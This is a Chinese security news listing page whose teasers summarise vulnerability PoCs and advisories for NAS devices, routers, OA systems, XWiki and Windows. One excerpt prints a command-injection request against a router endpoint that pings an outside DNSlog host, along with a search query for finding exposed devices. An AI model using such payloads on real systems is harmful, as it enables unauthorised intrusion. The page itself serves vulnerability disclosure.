安全漏洞 - 第 306 | CN-SEC 中文网

安全漏洞

通天星CMSV6车载定位监控平台 point_manage/merge SQL注入致RCE漏洞 PoC

0x01 免责声明免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来...

06月25日85 views评论

阅读全文

CVE-2024-29973 POC

Zyxel-NAS设备setCookie未授权命令注入漏洞(CVE-2024-29973) Zyxel-NAS是一款网络存储设备，用于存储和共享文件、照片、视频和其他数据。它支持多种协议，包括SMB、...

06月25日安全漏洞48 views评论

阅读全文

安全漏洞

世邦通信 SPON IP网络对讲广播系统 addmediadata.php 任意文件上传漏洞 poc

产品简介世邦通信 SPON IP网络对讲广播系统采用领先的IPAudio技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。漏洞描述世邦通信 SPON IP网络对讲广播...

06月25日80 views评论

阅读全文

安全漏洞

CVE-2024-31982 漏洞复现

01 — 漏洞名称 XWiki DatabaseSearch 远程代码执行漏洞02—漏洞影响 XWiki平台 2.4-milestone-1及之前的版本4.10.20、15.5.4和1...

06月25日279 views评论

阅读全文

安全漏洞

海康威视综合安防管理平台远程命令执行漏洞（Fastjson）

0x00写在前面本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！0x01漏洞介绍海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计，采用业务组件化技术，...

06月25日57 views评论

阅读全文

安全漏洞

App托管服务分发平台 index-uplog.php接口处存在任意文件上传漏洞

Ⅰ、漏洞描述 App托管服务分发平台是指一种云计算服务模式，允许开发者将应用程序部署到云端，然后通过平台提供的管理和分发机制，将应用程序交付给最终用户。这种平台通常提供了自动化的构建、测试、部署、监控...

06月25日28 views评论

阅读全文

安全漏洞

【PoC】CVE-2024-33113 D-LINK DIR-845L 路由器漏洞

鸡肋，市面上没多少设备，fofa才搜出80多台，设备还是停产的。验证PoC是可行的。D-LINK DIR-845L 存在通过 bsc_sms_inbox.php 文件进行信息泄露的漏洞。CVE-202...

06月25日171 views评论

阅读全文

安全漏洞

windows 提权漏洞预警CVE-2024-26229

漏洞成因（CVE-2024-26229）Windows CSC服务特权提升漏洞，csc.sys驱动程序中带有METHOD_NEITHER I/O控制代码的IOCTL地址验证不正确。当IOCTL使用ME...

06月25日54 views评论

阅读全文

安全漏洞

极企智能办公路由存在RCE漏洞

资产收集 title="极企智能办公路由" 漏洞复现构造url，请求DNSlog /notice/jumper.php?t=;ping%20u0iee.z9z.top 原文始发于微信公众号（Devi...

06月25日27 views评论

阅读全文

安全漏洞

XWiki DatabaseSearch 存在远程命令执行漏洞CVE-2024-31982 附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使...

06月25日158 views评论

阅读全文

安全漏洞

漏洞预警万户 ezOFFICE OA officeserver 文件上传漏洞

0x01 阅读须知融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操...

06月25日63 views评论

阅读全文

安全漏洞

漏洞通告 | 蓝凌 EKP 远程代码执行漏洞

漏洞概况蓝凌 EKP 是由深圳市蓝凌软件股份有限公司开发，是一款针对中小企业的移动化智能办公产品。近日，微步漏洞团队获取到蓝凌 EKP 远程代码执行漏洞情报（https://x.threatbook....

06月25日255 views评论

阅读全文

在线咨询

微信